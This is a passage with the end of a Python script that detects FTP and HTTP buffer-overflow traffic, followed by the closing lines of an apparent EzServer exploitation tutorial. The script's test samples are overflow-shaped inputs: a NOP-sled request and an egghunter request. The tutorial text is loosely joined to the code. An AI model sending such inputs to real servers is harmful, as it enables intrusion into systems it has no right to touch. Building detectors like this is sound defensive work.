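        findings.append(f"argument of {len(m.group(2))} bytes exceeds {MAX_FTP_ARG}")
    return findings + signature_hits(data)

# Constructed samples shaped like the fuzzer traffic above, not captures from the blog.
FTP_SAMPLE = b"\x41" * 3000                                            # KnFtpd fuzzer: no verb, no CRLF
HTTP_SAMPLE = b"GET /" + b"\x90" * 5954 + b"\r\n\r\n" + b"HTTP/1.1"    # EzServer fuzzer shape
EGG_SAMPLE = b"GET /" + EGG_TAG * 2 + b"\x90" * 70 + HUNTER_STUB + b" HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    print(check_ftp_command(FTP_SAMPLE))
    print(check_http_request(HTTP_SAMPLE))
    print(check_http_request(EGG_SAMPLE))
```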






Run EzServer

and this is the result

Fuzz from the terminal
Type "telnet ip_target port_target"
From the picture above we see that we have managed to do the exploitation
Alhamdulillah